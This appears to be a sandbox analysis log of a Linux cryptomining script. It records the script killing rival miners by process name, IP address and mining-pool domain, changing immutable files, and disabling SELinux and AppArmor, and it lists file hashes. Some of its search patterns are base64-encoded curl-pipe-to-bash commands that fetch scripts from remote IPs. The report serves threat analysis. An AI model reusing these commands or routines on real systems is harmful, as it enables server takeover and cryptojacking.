/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep gitee.com2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep 104.248.4.1622⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep 89.35.39.782⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep /dev/shm/z3.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep kthrotlds2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep ksoftirqds2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep netdns2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep watchdogs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep kdevtmpfsi2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep kinsing2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep redis22⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep " ps"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep sync_supers2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/bin/grepgrep cpuset2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep "x]"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep "sh] <"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep " \\[]"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep /tmp/l.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep /tmp/zmcat2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep CnzFVPLF2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep CvKzzZLs2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep /tmp/udevd2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep sustse2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep sustse32⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep mr.sh2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep j2.conf2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep ficov2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep ficov2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep nullcrew2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep nullcrew2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep 107.174.47.1562⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep 83.220.169.2472⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep 51.38.203.1462⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep 144.217.45.452⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep 107.174.47.1812⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep mine.moneropool.com2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep pool.t00ls.ru2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grep
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep monerohash.com2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep /tmp/a7b104c2702⤵
- Disables SELinux
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/bin/grepgrep stratum.f2pool.com:88882⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep xmrpool.eu2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep kieuanilam.me2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep xiaoyao2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/local/sbin/killkill -9 16113⤵
-
-
/usr/local/bin/killkill -9 16113⤵
-
-
/usr/sbin/killkill -9 16113⤵
-
-
/usr/bin/killkill -9 16113⤵
-
-
/sbin/killkill -9 16113⤵
-
-
/bin/killkill -9 16113⤵
-
-
-
/bin/psps auxf2⤵
-
-
/bin/grepgrep xiaoxue2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 16163⤵
-
-
/usr/local/bin/killkill -9 16163⤵
-
-
/usr/sbin/killkill -9 16163⤵
-
-
/usr/bin/killkill -9 16163⤵
-
-
/sbin/killkill -9 16163⤵
-
-
/bin/killkill -9 16163⤵
- Reads CPU attributes
-
-
-
/bin/grepgrep 46.243.253.152⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f L2Jpbi9iYXN2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f xzpauectgr2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f slxfbkmxtd2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mixtape2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f addnj2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 200.68.17.1962⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f IyEvYmluL3NoCgpzUG2⤵
-
-
/usr/bin/pgreppgrep -f KHdnZXQgLXFPLSBodHRw2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS32⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mwyumwdbpq.conf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f honvbsasbf.conf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mqdsflm.cf2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f lower.sh2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./ppp2⤵
- Reads CPU attributes
-
-
/usr/bin/pgreppgrep -f ./seervceaess2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./servceaess2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servceas2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servcesa2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./vsp2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./jvs2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./pvv2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./vpp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./pces2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./rspce2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./haveged2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./jiba2⤵
- Reads CPU attributes
-
-
/usr/sbin/sendmailsendmail -t1⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1ri8M8-0000C0-Lt2⤵
- Reads CPU attributes
-
-
/usr/sbin/sendmailsendmail -t1⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1ri8M3-0000C3-Fg2⤵
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
- Enumerates kernel/hardware configuration
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
825B
MD5fa2872ab947b44ac47bb5bcde82b54a5
SHA1f6b2bdec4fc1a9f77349b6b93b682e6d31596f89
SHA2560deff3275fddecb04c8d0c65f6b128c6bf63ac2696ee263e689507a228a5610e
SHA512de102b00437535717909876284f769c39e3fd296e2c2eb32ab56e4c0b3815b82cd9fbf8b1f507b31f79db2aadf9ada376ebf333b674ab368706bae5ad6915f43
-
Filesize
1KB
MD520db8011915c255ec78d2b3ec17c5857
SHA1efe251921ad8e71e4f78c29faeec8089aa2ee0a8
SHA256ed06a7d74222087a1ed7b54d119286d7a2a0985a451554d97ae43e4e59aa253a
SHA5128511f100d52ac20e3fc27ffadf09a45b41bce42740cc54bb642990fe8de4889817f7893746d8e366a79c415b30992a6560ce8aec19a71c51280d47f8598a6b6b
-
Filesize
146B
MD5c25c880547628dcb6b3b5eb34815478e
SHA1903957786accc04540156775b94b8d52dd74e31f
SHA25611858859a1fe9a7967cf292e07a684a27e39899f519cb5b3d5a047efabc8c173
SHA512e0c37095f875ba61dc36e8b81c1d7fdced38b61b9da0527b76909f5ac8cdb68fce4fdc23097627ee2607f19dae74d53e39c6bb4cdb8415cdbe9cf408d5a0ccbb
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
915B
MD55557415287820004862a16b31b2bf077
SHA1c2e0449f9b5074d9c39382c9483ca6bb3c41b6f1
SHA256075ea045184aa7dc3a64608e1241eea36362e290be810f3434d504e711d9282a
SHA5125cb31bee97ba93ce3997897c09a54d20af60d989129fc922a78bc6eb952b88c83187a6c85accb27f73aea4442f52f7bf3643ede6b4ed478e639386be3a210830
-
Filesize
915B
MD57cb56185b04b50126720d6158b4d1bfa
SHA1660fe4e8ddb40bea2d8d96baa32700118bfab385
SHA25615c472e91f030b400ad976b3a0a08dcb764579cc3a02a2c66f11b2d50d0e44b4
SHA5122a2452dcfbd700d511d6a8c4a95a0929b7024ff5df7b1b093792d617e7c04ad797de5b33b1f46f4f18e6d9354a8a82329ff76b3ae528911c1509363318c1e5ea
-
Filesize
288B
MD53412efc77b848950f0ed46ee88033619
SHA1fa626f3cacdb6b7554c6c814e9ef5c3e9930d6e6
SHA25681362ec242076f7c6709a674a045a3891fc1f0a0f1246fbf7da38db0db1343c3
SHA512f64522e6a04e3c101b1e684f625c3b661768f72c60b11a7ef8b40e39310e574fa348ae12afa911efd0ad9fe010717762a581fddf7d36ae287017fce380d0ff77
-
Filesize
89B
MD59e23eb9149954bc5255f07eac15791c4
SHA128bcd0c147f24f407bfed5807093b885a1c95d7b
SHA2566ee89cbed9674fe75821df019928acb26ed93c9f76542d7e6e4c34af8c74d447
SHA51256b0ae4b8481e20689c11ef40fab8faeebdc6122a6df86538590eee5ec3ee5669f567c71929b80f7725c7a9aca5e84942f984e24c2fe4f4bd1e406e8e3e7b55e
-
Filesize
288B
MD5d2ddb151525953c5bc9874913ded09a2
SHA15dfe5c1a0e0e21c9742384e794812ceaa90a3ab3
SHA2569ad7a404c5d9df8a816c95cc78595d0bd436637a5de15b4b2b1a7415c95afd8e
SHA512f88ae3052e52c5fe1c5ad5cd17a9c6c6663a7d66dcd7b03ce8aaf29b716a60e317fac110b703589917725e9f38a61bbc02b50edb967f0edb4ba49a9a44f47520
-
Filesize
89B
MD56cdbd5613b1e403bd4d895f908eb2385
SHA1abdbad01da1c327bf00f894728b4d76b0fa25314
SHA25696efc573230267aebb7997540d745f10cf5cb2920ab2d58f420780d366c3c4bd
SHA512c81767cf21bf96e9773c7efe35baab942b960a732861fec56feaab6765e95ec826a827635d7998ebdcf046b3315f0566b8169a5e1b0537d2a47fa422375a0590